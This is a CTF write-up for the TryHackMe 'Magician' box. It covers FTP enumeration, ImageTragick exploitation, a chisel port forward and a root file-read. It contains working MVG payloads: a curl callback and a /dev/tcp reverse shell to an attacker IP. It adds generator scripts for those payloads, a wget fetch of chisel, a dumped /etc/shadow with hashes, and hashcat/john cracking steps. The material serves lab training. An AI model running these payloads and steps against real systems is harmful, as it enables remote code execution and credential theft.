
Magician (ImageTragick, Port Forwarding)

First, enumerate the open ports and services with nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  nmap -A 10.10.208.142 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-27 08:02 +0630
Nmap scan report for magician (10.10.208.142)
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.90 seconds

Port 21

Logging in to FTP as the anonymous user looks like it hangs at first, but the login eventually succeeds (the server delays it on purpose, as its own banner explains); after that, listing the directory is refused.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  ftp magician 
Connected to magician.
220 THE MAGIC DOOR
Name (magician:hnl): anonymous
331 Please specify the password.
Password:

230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> 
ftp> ls
550 Permission denied.
ftp: bind: Address already in use

The bind error comes from active-mode FTP trying to open a local data port; switching to passive mode with the ftp client's passive command avoids it, but the 550 shows the listing is denied regardless. The only thing of value here is the hint in the banner: the vsftpd option delay_successful_login explains the slow login, and the link points at ImageTragick, which is the way into the web application.

Port 8081

When you browse to http://magician:8081/, you will see an image upload form.

With Burp intercepting the request, I first uploaded a custom PNG file; the response reported that the upload succeeded.

What about exploit.php? That was accepted as well.

Requesting the uploaded file to trigger a reverse shell returned an error, though, so a plain PHP webshell is not the way in:

curl http://magician:8080/files/shell.php

The uploads are processed by ImageMagick, which is vulnerable to ImageTragick (CVE-2016-3714): a filename or URL embedded in an MVG/SVG image is passed to the delegate command line without filtering shell metacharacters, so a crafted "image" executes commands on the server. A full write-up is at https://mukarramkhalid.com/imagemagick-imagetragick-exploit/. The exploit.png below is the curl-callback payload from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Picture%20Image%20Magik/imagetragik1_payload_url_curl.png, with the callback address changed to our machine (the "little tweak" the FTP banner hinted at):

push graphic-context
viewbox 0 0 640 480
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "10.9.0.82)'
pop graphic-context

After exploit.png is uploaded, the target makes an HTTP request back to 10.9.0.82, which confirms that the injected command runs on the server.

Now upload a payload that spawns a reverse shell instead. This is the /dev/tcp payload from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Picture%20Image%20Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg, with the listener set to 10.9.0.82:9001:

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/10.9.0.82/9001 0<&1 2>&1'
pop graphic-context
pop graphic-context
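The two payloads above have the attacker address hard-coded, so every new VPN address means editing them by hand. The following script is an added example, not part of the original write-up or of PayloadsAllTheThings: it generates both MVG payloads with the listener address and port as parameters. It assumes, as on this box, that the upload is handed to an ImageMagick build that still processes MVG and its URL and pipe delegates (the ImageTragick policy.xml fixes not applied). The /dev/tcp redirection in the second payload is a bash feature; it works here because the shell that ImageMagick spawns is bash (the sh-4.4 prompt later), but on a system where /bin/sh is dash the command would need a bash -c wrapper.

```shell
#!/bin/sh
# Added example (not from the original write-up): generate the two ImageTragick
# (CVE-2016-3714) MVG payloads with the listener address parameterised.
# Assumption: the target passes uploads to a vulnerable ImageMagick whose policy.xml
# does not disable the MVG, URL and EPHEMERAL coders.

# Stage 1: blind callback. The URL is interpolated unescaped into the delegate
# command line (e.g. "wget" -q -O "%o" "https:%M"), so closing the quote and
# appending ';curl "<host>' runs curl back to us. Watch for the hit with a
# listener on 10.9.0.82 (nc -lvnp 80) or tcpdump.
mvg_curl_probe() {
    lhost="$1"
    cat <<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";curl "${lhost})'
pop graphic-context
EOF
}

# Stage 2: reverse shell. ImageMagick opens a filename that begins with '|'
# through popen(), so the 'image' primitive runs the command instead of
# reading a file. The redirection makes the shell talk to lhost:lport.
mvg_revshell() {
    lhost="$1"; lport="$2"
    cat <<EOF
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/${lhost}/${lport} 0<&1 2>&1'
pop graphic-context
pop graphic-context
EOF
}

# Write both payloads to disk. The extension is irrelevant: ImageMagick sniffs
# the content and treats the file as MVG, which is why a ".png" works.
write_payloads() {
    lhost="$1"; lport="$2"; outdir="${3:-.}"
    mvg_curl_probe "$lhost" > "$outdir/exploit.png"
    mvg_revshell "$lhost" "$lport" > "$outdir/shell.png"
    ls "$outdir/exploit.png" "$outdir/shell.png"
}
```

Usage: `write_payloads 10.9.0.82 9001 /tmp`, start `nc -lvnp 9001`, then upload /tmp/shell.png through the form exactly as above.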

With a listener waiting on port 9001 (nc -lvnp 9001), the netcat session receives the reverse shell as soon as the server processes the image.

User

Upgrade the raw shell to a TTY with Python's pty module:

sh-4.4$ /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

Read the user flag.

sh-4.4$ cd
sh-4.4$ ls -al
total 17204
drwxr-xr-x 5 magician magician     4096 Feb 13  2021 .
drwxr-xr-x 3 root     root         4096 Jan 30  2021 ..
lrwxrwxrwx 1 magician magician        9 Feb  6  2021 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 magician magician     3771 Apr  4  2018 .bashrc
drwx------ 2 magician magician     4096 Jan 30  2021 .cache
drwx------ 3 magician magician     4096 Jan 30  2021 .gnupg
-rw-r--r-- 1 magician magician      807 Apr  4  2018 .profile
-rw-r--r-- 1 magician magician        0 Jan 30  2021 .sudo_as_admin_successful
-rw------- 1 magician magician     7546 Jan 31  2021 .viminfo
-rw-r--r-- 1 root     root     17565546 Jan 30  2021 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician      170 Feb 13  2021 the_magic_continues
drwxr-xr-x 2 root     root         4096 Feb  5  2021 uploads
-rw-r--r-- 1 magician magician       24 Jan 30  2021 user.txt
sh-4.4$ cat user.txt
THM{simsalabim_hex_hex}

Root

Listing the listening sockets with netstat shows a service on 127.0.0.1:6666 that is bound to loopback only, which is why the external nmap scan never saw it.

sh-4.4$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -                   
tcp        0    299 10.10.210.247:41436     10.9.0.82:9001          ESTABLISHED 1374/sh             
tcp6       0      0 :::8080                 :::*                    LISTEN      951/java            
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 10.10.210.247:8080      10.9.0.82:54102         ESTABLISHED 951/java          

There is no SSH on the box (nmap showed only 21 and 8081, and netstat shows no listener on 22), so use chisel for the port forward. Serve the chisel binary from the attacker machine (for example with python3 -m http.server 1234) and fetch it on the target:

sh-4.4$ wget http://10.9.0.82:1234/chisel;chmod 777 chisel

Now set up a reverse port forward so that port 6666 on the target is reachable from the attacker machine:

# Attacker: chisel server listening on 8000, accepting reverse forwards
./chisel server -p 8000 --reverse

# Target: connect back to the server and ask it to bind port 9999 on the attacker side,
# relaying every connection to localhost:6666 on the target
./chisel client 10.9.0.82:8000 R:9999:localhost:6666
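Picking the loopback-only listener out of the netstat output and turning it into the right chisel command line is the step that is easy to get wrong (the R: syntax reads server-port:target-host:target-port). The script below is an added example, not part of the original write-up or of chisel: it parses the netstat -antp column layout, reports every LISTEN socket bound to 127.0.0.0/8 or ::1 (dropping systemd-resolved's stub on 127.0.0.53:53 as noise), and prints the matching chisel server and client commands. The netstat sample is constructed from the listing above, not captured live, and the chisel server port 8000 and starting local port 9999 are the values used on this page.

```shell
#!/bin/sh
# Added example (not from the original write-up): find services bound only to
# loopback and emit the chisel reverse-forward commands that expose them.
# Assumes GNU netstat's "-antp" column layout. Sample constructed from the page's listing.

NETSTAT_SAMPLE='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -
tcp        0    299 10.10.210.247:41436     10.9.0.82:9001          ESTABLISHED 1374/sh
tcp6       0      0 :::8080                 :::*                    LISTEN      951/java
tcp6       0      0 :::21                   :::*                    LISTEN      -'

# Print the port of every LISTEN socket bound to a loopback address. These are
# the services an external scan cannot reach and therefore the forwarding targets.
loopback_listeners() {
    printf '%s\n' "$1" | awk '
        $6 == "LISTEN" && ($4 ~ /^127\./ || $4 ~ /^::1:/) && $4 != "127.0.0.53:53" {
            port = $4; sub(/.*:/, "", port); print port
        }'
}

# Emit the attacker-side server and target-side client commands for one reverse
# forward: the client connects to attacker:srvport and asks the server to bind
# localport on the attacker host, relaying each connection to 127.0.0.1:victimport
# as seen from the target.
chisel_reverse_forward() {
    attacker="$1"; srvport="$2"; localport="$3"; victimport="$4"
    printf 'attacker: ./chisel server -p %s --reverse\n' "$srvport"
    printf 'target:   ./chisel client %s:%s R:%s:127.0.0.1:%s\n' \
        "$attacker" "$srvport" "$localport" "$victimport"
}

# One forward per hidden port, allocating attacker-side ports upward from base.
plan_forwards() {
    attacker="$1"; base="${2:-9999}"
    loopback_listeners "$NETSTAT_SAMPLE" | while read -r port; do
        chisel_reverse_forward "$attacker" 8000 "$base" "$port"
        base=$((base + 1))
    done
}
```

Run `plan_forwards 10.9.0.82` to get the two command lines; after both are running, `curl -s http://127.0.0.1:9999/` from the attacker machine should return the hidden service's page, and `ss -lnt` on the attacker side should show 9999 listening.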

Browsing to http://127.0.0.1:9999 now shows a page with an "Enter filename" input field. Entering /etc/shadow returns the file base64-encoded; decoding it shows that the service reads files with root-level access:

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  echo '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' | base64 -d
root:$6$NHggwdue$.yIva.bW5tMrYsr5mlTN/tqwaewN5s8fkbQ9rE7Sy0TUtjxSZsmqHb2qL/R5mj7ItKGxwbObqPPjWl1laHU8e0:18663:0:99999:7:::
daemon:*:18480:0:99999:7:::
bin:*:18480:0:99999:7:::
sys:*:18480:0:99999:7:::
sync:*:18480:0:99999:7:::
games:*:18480:0:99999:7:::
man:*:18480:0:99999:7:::
lp:*:18480:0:99999:7:::
mail:*:18480:0:99999:7:::
news:*:18480:0:99999:7:::
uucp:*:18480:0:99999:7:::
proxy:*:18480:0:99999:7:::
www-data:*:18480:0:99999:7:::
backup:*:18480:0:99999:7:::
list:*:18480:0:99999:7:::
irc:*:18480:0:99999:7:::
gnats:*:18480:0:99999:7:::
nobody:*:18480:0:99999:7:::
systemd-network:*:18480:0:99999:7:::
systemd-resolve:*:18480:0:99999:7:::
syslog:*:18480:0:99999:7:::
messagebus:*:18480:0:99999:7:::
_apt:*:18480:0:99999:7:::
lxd:*:18480:0:99999:7:::
uuidd:*:18480:0:99999:7:::
dnsmasq:*:18480:0:99999:7:::
landscape:*:18480:0:99999:7:::
pollinate:*:18480:0:99999:7:::
sshd:*:18657:0:99999:7:::
magician:$6$nBIzQ2jG/we91L0Z$iWaU/g8Z0JggNy7VRmQEB15jfAWTsydFjBOBQ8aN5T/0bobcyAbPR4gqUpvANKEX2rQbQnniaoHSlR5wXOeko.:18657:0:99999:7:::
ftp:*:18657:0:99999:7:::

Cracking the root hash is slow and unnecessary here: the same file-read service can fetch the root flag directly.
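Before deciding whether cracking is worth the time, it helps to know which shadow entries actually carry a hash and which algorithm they use. The script below is an added example, not part of the original write-up: it filters a shadow file down to crackable accounts, names the crypt(3) algorithm from the $id$ prefix and prints the corresponding hashcat mode. The sample is constructed from the listing above (a subset of the lines, hashes as shown).

```shell
#!/bin/sh
# Added example (not from the original write-up): triage /etc/shadow before cracking.
# Sample constructed from the page's listing (subset of entries).
SHADOW_SAMPLE='root:$6$NHggwdue$.yIva.bW5tMrYsr5mlTN/tqwaewN5s8fkbQ9rE7Sy0TUtjxSZsmqHb2qL/R5mj7ItKGxwbObqPPjWl1laHU8e0:18663:0:99999:7:::
daemon:*:18480:0:99999:7:::
sshd:*:18657:0:99999:7:::
magician:$6$nBIzQ2jG/we91L0Z$iWaU/g8Z0JggNy7VRmQEB15jfAWTsydFjBOBQ8aN5T/0bobcyAbPR4gqUpvANKEX2rQbQnniaoHSlR5wXOeko.:18657:0:99999:7:::
ftp:*:18657:0:99999:7:::'

# Map the crypt(3) id prefix to an algorithm name and the hashcat -m mode.
# yescrypt (modern Debian/Ubuntu default) has no hashcat mode; use john for it.
hash_family() {
    case "$1" in
        '$1$'*)        echo "md5crypt 500" ;;
        '$5$'*)        echo "sha256crypt 7400" ;;
        '$6$'*)        echo "sha512crypt 1800" ;;
        '$y$'*|'$7$'*) echo "yescrypt -" ;;
        *)             echo "unknown -" ;;
    esac
}

# Print "user algorithm mode" for every entry whose password field is a real
# hash, skipping locked (*, !...) and empty entries.
crackable_accounts() {
    printf '%s\n' "$1" | while IFS=: read -r user hash rest; do
        case "$hash" in
            ''|'*'|'!'*) continue ;;
        esac
        printf '%s %s\n' "$user" "$(hash_family "$hash")"
    done
}

# Emit user:hash lines for the crackable entries, the input format both john
# and hashcat --username accept.
john_input() {
    printf '%s\n' "$1" | while IFS=: read -r user hash rest; do
        case "$hash" in
            ''|'*'|'!'*) continue ;;
        esac
        printf '%s:%s\n' "$user" "$hash"
    done
}
```

Usage: `john_input "$SHADOW_SAMPLE" > hashes.txt`, then `hashcat -m 1800 --username hashes.txt rockyou.txt` or `john --format=sha512crypt hashes.txt`. sha512crypt with its default 5000 rounds is slow per guess, which is the practical reason the write-up skips cracking and reads the flag through the file-read service instead.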

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  echo 'VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K' | base64 -d
THM{magic_may_make_many_men_mad}
